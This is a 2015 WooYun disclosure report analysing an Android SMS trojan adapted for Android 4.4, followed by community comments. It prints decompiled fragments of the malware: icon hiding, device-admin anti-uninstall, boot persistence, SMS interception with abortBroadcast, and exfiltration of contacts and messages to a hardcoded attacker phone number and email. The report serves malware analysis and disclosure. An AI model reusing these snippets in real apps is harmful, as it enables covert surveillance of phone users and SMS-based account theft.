当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107785

漏洞标题:黑产兼容android 4.4的蠕虫短信马出现(附受害者信息)

相关厂商:cncert

漏洞作者: 路人甲

提交时间:2015-04-14 11:53

修复时间:2015-07-16 09:56

公开时间:2015-07-16 09:56

漏洞类型:地下0day/成功的入侵事件

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向第三方安全合作伙伴开放
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

高版本的Android不一定安全哦,还是要注意使用习惯.木马通过邮件发送通信录和历史短信,实时截获短信,并且可以通过短信指令控制手机.为啥这些个安全团队/厂商的壳都给木马在用了.

详细说明:

木马用了阿里的壳,脱壳比较蛋疼
因为android 4.4 只有默认短信app才能收发短信,木马在服务中加入了兼容代码

service.png


smsdoor3.png


注意不要点这个哦.

smsdoor4.png


硬编码的发件邮箱

mail.png


入口1:主界面aa.bb.cc.dd.ClientActivity,进行如下操作:

* 隐藏图标
#!java
getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
* 激活设备管理
#!java
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.componentName);
localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "");
startActivityForResult(localIntent, 20);
* 启动MyService
#!java
startService(new Intent(this, MyService.class));
* 通过短信发送受害者设备id给18458174771
#!java
Assets.sendMsg("18458174771", Assets.getInstallFlag(this, ""));
* 启动MailTask,后台通过邮件发送受害者手机号+设备id(邮件标题)和通信录(邮件内容)给mmqwe1231@163.com
#!java
new MailTask("", this).execute(new Integer[0])

* 启动SmsTask,后台通过邮件发送受害者手机号+设备id(邮件标题)和短信历史(邮件内容)给mmqwe1231@163.com
#!java
new SmsTask("", this).execute(new Integer[0]);

防卸载:设备管理器

<receiver android:name="com.iwawad.vaaweea00.Dx" android:permission="android.permission.BIND_DEVICE_ADMIN">
			
			<meta-data android:name="android.app.device_admin" android:resource="@7F040000">
			</meta-data>
			
			<intent-filter>
				
				<action android:name="android.app.action.DEVICE_ADMIN_ENABLED">
				</action>
				
			</intent-filter>
			
		</receiver>


入口2:开机启动广播接收器aa.bb.cc.dd.BootReceiver

<receiver android:name="aa.bb.cc.dd.BootReceiver">
			
			<intent-filter android:priority="2147483647">
				
				<action android:name="android.intent.action.BOOT_COMPLETED">
			</action>
				
			</intent-filter>



进行如下操作:

* 启动服务com.iwawad.vaaweea00.MyService

#!java
		paramContext.startService(new Intent(paramContext, MyService.class));



* 发送监控安装短信给18458174771

#!java
		SmsManager.getDefault().sendTextMessage("18458174771", null, paramContext.getString(2131165186), null, null); //String为监控安装



后台服务:com.iwawad.vaaweea00.MyService

service.png


* 对系统版本进行判断,android 4.4启动WebInterfaceActivity,用于设置成默认短信管理软件来得到

#!java
		if ((String.valueOf(Build.VERSION.RELEASE).indexOf("4.4") != -1) && (!Telephony.Sms.getDefaultSmsPackage(MyService.this).equals(str)))
        {
          Intent localIntent = new Intent(MyService.this, WebInterfaceActivity.class);
          localIntent.addFlags(268435456);
          MyService.this.startActivity(localIntent);
        }


default sms app特性已经被木马使用,之前还以为此机制加入会对短信马会有极大遏制,但是现在想想既然傻傻的安装了木马,再傻傻的设置为默认好像很正常.一种木马诞生后往往不会消亡,它会不断的演变进化,此木马就通过简单的代码顺利兼容了android4.4.
入口3:短信广播接收器com.iwawad.vaaweea00.XReceiver
<receiver android:name="com.iwawad.vaaweea00.XReceiver" android:permission="android.permission.BROADCAST_SMS">

<intent-filter android:priority="2147483647"> //设置优先级

<action android:name="android.provider.Telephony.SMS_RECEIVED">//接收短信
</action>

<category android:name="android.intent.category.DEFAULT">
</category>

</intent-filter>

<intent-filter>

<action android:name="android.provider.Telephony.SMS_DELIVER"> //4.4特性,default SMS app
</action>

</intent-filter>

</receiver>

![](recevier.png)
* 短信广播接收器设置最高接收优先级拦截短信,abortBroadcast();忽略短信广播.
* 启动拨号界面```tel:**21*121# **21*# ##21#``` //貌似是测试设备有没有卡
* 拦截记录收(MailTask/SmsTask)发(SendTask)短信邮件通知mmqwe1231@163.com
* 短信指令控制手机:监控状态 SetupMessagesyncTask/发送指定短信 SendMessageasyncTask

send.png


setup.png


漏洞证明:

一些受害者的信息

mailcollect.jpg


mailcollect2.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-17 09:54

厂商回复:

CNVD确认为移动互联网恶意代码事件,已经转报给CNCERT,按照工业和信息化部《移动互联网恶意程序监测与处置机制》流程处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-14 11:56 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    这不就是可以配合手机短信转账的木马么

  2. 2015-04-14 12:02 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个不就是偷了支付宝钱里的木马么

  3. 2015-04-14 12:02 | an0nym0u5 ( 普通白帽子 | Rank:172 漏洞数:31 )

    地下0day~。。我是来看如何利用的~

  4. 2015-04-14 12:08 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    传说 某人 因这个利用 被株连九族了

  5. 2015-04-14 12:10 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    楼下利用这个漏洞被株连九族了

  6. 2015-04-14 13:07 | Ning ( 实习白帽子 | Rank:47 漏洞数:6 )

    楼上因为和我同污被株连九族了

  7. 2015-04-14 14:09 | cncert国家互联网应急中心(乌云厂商)

    您好! 感谢您对CNVD的支持,请您提供测试样本并邮件vreport@cert.org.cn,以便CNVD及时处置。 祝好!

  8. 2015-04-14 19:07 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    这不就是可以配合手机短信转账的木马么? 我觉得三四线城市是重灾区

  9. 2015-04-14 21:09 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    这个不就是截取网银帐号的木马么

  10. 2015-04-14 22:16 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    。。不愧是黑产牛!

  11. 2015-04-14 23:34 | Code_Monkey ( 路人 | Rank:24 漏洞数:7 | Code Monkey think someday he have everyt...)

    路人甲才是最牛逼的。

  12. 2015-04-15 19:44 | O夜莺O ( 路人 | Rank:2 漏洞数:1 | 继续为网络安全护航。)

    大牛,你QQ多少求请教

  13. 2015-04-17 10:08 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    CCAV 看这里。。

  14. 2015-04-17 10:14 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    这不是就是盗QQ的木马么

  15. 2015-04-17 11:29 | DARKSTON ( 路人 | Rank:8 漏洞数:2 )

    你好!感谢你对CNAV 的支持,请你提供测试样本并邮件229685660@qq.com,以便CNAV 及时处理,祝好!

  16. 2015-04-17 16:25 | AgeloVito ( 路人 | Rank:8 漏洞数:2 | Just do what i love, enjoy it and try my...)

    @DARKSTON 社工没做好啊,邮箱不行

  17. 2015-04-17 21:51 | DARKSTON ( 路人 | Rank:8 漏洞数:2 )

    @AgeloVito 我每个星期改一次密码。。

  18. 2015-08-29 08:38 | Raven ( 路人 | Rank:4 漏洞数:1 | 挖洞不易,且挖且珍惜)

    我回家种地去了。。